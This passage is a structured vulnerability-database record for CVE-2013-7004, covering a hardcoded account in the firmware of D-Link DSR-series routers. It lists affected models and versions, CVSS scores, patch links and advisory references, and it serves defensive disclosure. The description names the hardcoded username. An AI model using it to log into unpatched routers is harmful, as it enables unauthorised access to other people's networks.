"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201312-0289",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dsr-500n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b43"
},
{
"model": "dsr-1000n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b23"
},
{
"model": "dsr-1000",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.02b11"
},
{
"model": "dsr-1000n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.04b58"
},
{
"model": "dsr-250",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.08b31"
},
{
"model": "dsr-1000",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.06b43"
},
{
"model": "dsr-250n",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.08b39"
},
{
"model": "dsr-1000",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.06b53"
},
{
"model": "dsr-500",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.06b43"
},
{
"model": "dsr-500",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.06b53"
},
{
"model": "dsr-250n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.08b31"
},
{
"model": "dsr-1000",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.02b25"
},
{
"model": "dsr-500n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b27"
},
{
"model": "dsr-250",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.05b53"
},
{
"model": "dsr-1000",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b36"
},
{
"model": "dsr-500",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b36"
},
{
"model": "dsr-500",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dsr-500n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.02b11"
},
{
"model": "dsr-1000n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.01b50"
},
{
"model": "dsr-250n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.05b53"
},
{
"model": "dsr-500",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.02b25"
},
{
"model": "dsr-250",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.08b39"
},
{
"model": "dsr-500n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.06b43"
},
{
"model": "dsr-500n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.06b53"
},
{
"model": "dsr-150",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.05b50"
},
{
"model": "dsr-500",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b27"
},
{
"model": "dsr-250",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dsr-150",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.05b35"
},
{
"model": "dsr-1000n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b12"
},
{
"model": "dsr-1000",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b23"
},
{
"model": "dsr-500n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b36"
},
{
"model": "dsr-1000n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b43"
},
{
"model": "dsr-500",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b23"
},
{
"model": "dsr-1000",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.04b58"
},
{
"model": "dsr-500n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.02b25"
},
{
"model": "dsr-150",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.08b29"
},
{
"model": "dsr-500",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.04b58"
},
{
"model": "dsr-1000",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dsr-250",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.05b20"
},
{
"model": "dsr-250n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.05b20"
},
{
"model": "dsr-1000n",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.08b51"
},
{
"model": "dsr-150n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dsr-500n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dsr-1000n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b27"
},
{
"model": "dsr-1000",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.01b50"
},
{
"model": "dsr-500n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b23"
},
{
"model": "dsr-1000n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.02b11"
},
{
"model": "dsr-500n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.04b58"
},
{
"model": "dsr-1000n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dsr-250",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.01b56"
},
{
"model": "dsr-250n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.01b56"
},
{
"model": "dsr-1000n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.06b43"
},
{
"model": "dsr-1000",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b43"
},
{
"model": "dsr-1000",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.08b51"
},
{
"model": "dsr-500",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b43"
},
{
"model": "dsr-1000",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b12"
},
{
"model": "dsr-1000n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.06b53"
},
{
"model": "dsr-500",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.08b51"
},
{
"model": "dsr-500",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b12"
},
{
"model": "dsr-1000n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b36"
},
{
"model": "dsr-150",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.05b29"
},
{
"model": "dsr-150",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dsr-150",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.05b46"
},
{
"model": "dsr-1000n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.02b25"
},
{
"model": "dsr-150n",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.05b48"
},
{
"model": "dsr-250",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.01b46"
},
{
"model": "dsr-1000",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b27"
},
{
"model": "dsr-250n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.01b46"
},
{
"model": "dsr-500n",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "1.08b51"
},
{
"model": "dsr-500n",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.03b12"
},
{
"model": "dsr-500",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.02b11"
},
{
"model": "dsr-1000",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dsr-1000",
"scope": "lt",
"trust": 0.8,
"vendor": "d link",
"version": "1.08b77"
},
{
"model": "dsr-1000n",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dsr-1000n",
"scope": "lt",
"trust": 0.8,
"vendor": "d link",
"version": "1.08b77"
},
{
"model": "dsr-150",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dsr-150",
"scope": "lt",
"trust": 0.8,
"vendor": "d link",
"version": "1.08b44"
},
{
"model": "dsr-150n",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dsr-150n",
"scope": "lt",
"trust": 0.8,
"vendor": "d link",
"version": "1.05b64"
},
{
"model": "dsr-250",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dsr-250",
"scope": "lt",
"trust": 0.8,
"vendor": "d link",
"version": "1.08b44"
},
{
"model": "dsr-250n",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dsr-250n",
"scope": "lt",
"trust": 0.8,
"vendor": "d link",
"version": "1.08b44"
},
{
"model": "dsr-500",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dsr-500",
"scope": "lt",
"trust": 0.8,
"vendor": "d link",
"version": "1.08b77"
},
{
"model": "dsr-500n",
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dsr-500n",
"scope": "lt",
"trust": 0.8,
"vendor": "d link",
"version": "1.08b77"
},
{
"model": "dsr-150 v1.08b44",
"scope": "lt",
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dsr-1000",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "1.02b11"
},
{
"model": "dsr-1000",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "1.02b25"
},
{
"model": "dsr-1000",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "1.03b36"
},
{
"model": "dsr-1000",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "1.03b23"
},
{
"model": "dsr-1000",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "1.03b27"
},
{
"model": "dsr-1000",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "1.04b58"
},
{
"model": "dsr-1000",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "1.06b43"
},
{
"model": "dsr-1000",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "1.01b50"
},
{
"model": "dsr-1000",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "1.03b12"
},
{
"model": "dsr-1000",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "1.03b43"
},
{
"model": "dsr-500n",
"scope": "eq",
"trust": 0.3,
"vendor": "d link",
"version": "0"
},
{
"model": "dsr-500",
"scope": "eq",
"trust": 0.3,
"vendor": "d link",
"version": "0"
},
{
"model": "dsr-250n",
"scope": "eq",
"trust": 0.3,
"vendor": "d link",
"version": "0"
},
{
"model": "dsr-250",
"scope": "eq",
"trust": 0.3,
"vendor": "d link",
"version": "0"
},
{
"model": "dsr-150n",
"scope": "eq",
"trust": 0.3,
"vendor": "d link",
"version": "0"
},
{
"model": "dsr-150",
"scope": "eq",
"trust": 0.3,
"vendor": "d link",
"version": "0"
},
{
"model": "dsr-1000n",
"scope": "eq",
"trust": 0.3,
"vendor": "d link",
"version": "0"
},
{
"model": "dsr-1000",
"scope": "eq",
"trust": 0.3,
"vendor": "d link",
"version": "0"
},
{
"model": "dsr-500n 1.08b77",
"scope": "ne",
"trust": 0.3,
"vendor": "d link",
"version": null
},
{
"model": "dsr-500 1.08b77",
"scope": "ne",
"trust": 0.3,
"vendor": "d link",
"version": null
},
{
"model": "dsr-250n 1.08b44",
"scope": "ne",
"trust": 0.3,
"vendor": "d link",
"version": null
},
{
"model": "dsr-250 1.08b44",
"scope": "ne",
"trust": 0.3,
"vendor": "d link",
"version": null
},
{
"model": "dsr-150n 1.05b64",
"scope": "ne",
"trust": 0.3,
"vendor": "d link",
"version": null
},
{
"model": "dsr-150 1.08b44",
"scope": "ne",
"trust": 0.3,
"vendor": "d link",
"version": null
},
{
"model": "dsr-1000n 1.08b77",
"scope": "ne",
"trust": 0.3,
"vendor": "d link",
"version": null
},
{
"model": "dsr-1000 1.08b77",
"scope": "ne",
"trust": 0.3,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-15548"
},
{
"db": "BID",
"id": "64462"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005615"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-400"
},
{
"db": "NVD",
"id": "CVE-2013-7004"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/h:d-link:dsr-1000",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dsr-1000_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:d-link:dsr-1000n",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dsr-1000n_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:d-link:dsr-150",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dsr-150_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:d-link:dsr-150n",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dsr-150n_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:d-link:dsr-250",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dsr-250_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:d-link:dsr-250n",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dsr-250n_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:d-link:dsr-500",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dsr-500_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:d-link:dsr-500n",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dsr-500n_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005615"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "nu11.nu11",
"sources": [
{
"db": "BID",
"id": "64462"
}
],
"trust": 0.3
},
"cve": "CVE-2013-7004",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 7.8,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2013-7004",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 7.8,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2013-15548",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 7.8,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-67006",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2013-7004",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2013-7004",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2013-15548",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201312-400",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-67006",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-15548"
},
{
"db": "VULHUB",
"id": "VHN-67006"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005615"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-400"
},
{
"db": "NVD",
"id": "CVE-2013-7004"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username. plural D-Link Router product firmware is user name gkJ9232xXyruTRmY There is a vulnerability that can be obtained because it has a hard-coded account.An access right may be obtained by using the user name information by a third party. D-Link DSR is a wireless service router product developed by D-Link. D-Link DSR Router Series are prone to a security-bypass vulnerability. A trust management vulnerability exists in several D-Link products. The vulnerability stems from the fact that the program has a hard-coded user account named \u0027gkJ9232xXyruTRmY\u0027. The following products and versions are affected: DSR-150 with firmware version 1.08B29 and earlier; DSR-150N with firmware version 1.05B51 and earlier; DSR-250 and DSR-250N with firmware version 1.08B39 and earlier; DSR-500, DSR-500N, DSR-1000, DSR-1000N with previous firmware versions",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-7004"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005615"
},
{
"db": "CNVD",
"id": "CNVD-2013-15548"
},
{
"db": "BID",
"id": "64462"
},
{
"db": "VULHUB",
"id": "VHN-67006"
}
],
"trust": 2.52
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-7004",
"trust": 3.4
},
{
"db": "EXPLOIT-DB",
"id": "30061",
"trust": 2.3
},
{
"db": "BID",
"id": "64462",
"trust": 1.0
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005615",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201312-400",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2013-15548",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-67006",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-15548"
},
{
"db": "VULHUB",
"id": "VHN-67006"
},
{
"db": "BID",
"id": "64462"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005615"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-400"
},
{
"db": "NVD",
"id": "CVE-2013-7004"
}
]
},
"id": "VAR-201312-0289",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-15548"
},
{
"db": "VULHUB",
"id": "VHN-67006"
}
],
"trust": 0.06999999999999999
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-15548"
}
]
},
"last_update_date": "2024-11-23T22:08:28.175000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Services Routers",
"trust": 0.8,
"url": "http://www.dlink.com/us/en/business-solutions/security/services-routers"
},
{
"title": "\u30eb\u30fc\u30bf\uff0f\u30d5\u30a1\u30a4\u30a2\u30a6\u30a9\u30fc\u30eb",
"trust": 0.8,
"url": "http://www.dlink-jp.com/router-firewall"
},
{
"title": "Downloads",
"trust": 0.8,
"url": "http://tsd.dlink.com.tw/"
},
{
"title": "D-Link DSR Router built-in account vulnerability patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/41959"
},
{
"title": "DSR-250N_A1_FW1",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47082"
},
{
"title": "DSR-250_A1_FW1",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47081"
},
{
"title": "DSR-150N_A2_FW1",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47080"
},
{
"title": "DSR-150_A2_FW1",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47079"
},
{
"title": "DSR-150_A1_FW1",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47078"
},
{
"title": "DSR-1000_A1_FW1",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47085"
},
{
"title": "DSR-500N_A1_FW1",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47084"
},
{
"title": "DSR-500_A1_FW1",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47083"
},
{
"title": "DSR-1000N_A1_FW1",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=47086"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-15548"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005615"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-400"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-255",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-67006"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005615"
},
{
"db": "NVD",
"id": "CVE-2013-7004"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.3,
"url": "http://www.exploit-db.com/exploits/30061"
},
{
"trust": 1.7,
"url": "http://tsd.dlink.com.tw/temp/pmd/12879/dsr-500_500n_1000_1000n_a1_release_notes_fw_v1.08b77_ww.pdf"
},
{
"trust": 1.7,
"url": "http://tsd.dlink.com.tw/temp/pmd/12960/dsr-150n_a2_release_notes_fw_v1.05b64_ww.pdf"
},
{
"trust": 1.7,
"url": "http://tsd.dlink.com.tw/temp/pmd/12966/dsr-150_a1_a2_release_notes_fw_v1.08b44_ww.pdf"
},
{
"trust": 1.7,
"url": "http://tsd.dlink.com.tw/temp/pmd/13039/dsr-250_250n_a1_a2_release_notes_fw_v1.08b44_ww_ru.pdf"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-7004"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-7004"
},
{
"trust": 0.3,
"url": "http://tsd.dlink.com.tw/"
},
{
"trust": 0.3,
"url": "http://www.dlink.com/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-15548"
},
{
"db": "VULHUB",
"id": "VHN-67006"
},
{
"db": "BID",
"id": "64462"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005615"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-400"
},
{
"db": "NVD",
"id": "CVE-2013-7004"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2013-15548"
},
{
"db": "VULHUB",
"id": "VHN-67006"
},
{
"db": "BID",
"id": "64462"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005615"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-400"
},
{
"db": "NVD",
"id": "CVE-2013-7004"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-12-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-15548"
},
{
"date": "2013-12-19T00:00:00",
"db": "VULHUB",
"id": "VHN-67006"
},
{
"date": "2013-12-20T00:00:00",
"db": "BID",
"id": "64462"
},
{
"date": "2013-12-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005615"
},
{
"date": "2013-12-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201312-400"
},
{
"date": "2013-12-19T04:24:57.463000",
"db": "NVD",
"id": "CVE-2013-7004"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-12-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-15548"
},
{
"date": "2013-12-19T00:00:00",
"db": "VULHUB",
"id": "VHN-67006"
},
{
"date": "2013-12-20T00:00:00",
"db": "BID",
"id": "64462"
},
{
"date": "2013-12-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005615"
},
{
"date": "2023-04-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201312-400"
},
{
"date": "2024-11-21T02:00:08.607000",
"db": "NVD",
"id": "CVE-2013-7004"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201312-400"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural D-Link Vulnerability to obtain access rights in router product firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005615"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "trust management problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201312-400"
}
],
"trust": 0.6
}
}
var-201312-0198
Vulnerability from variot
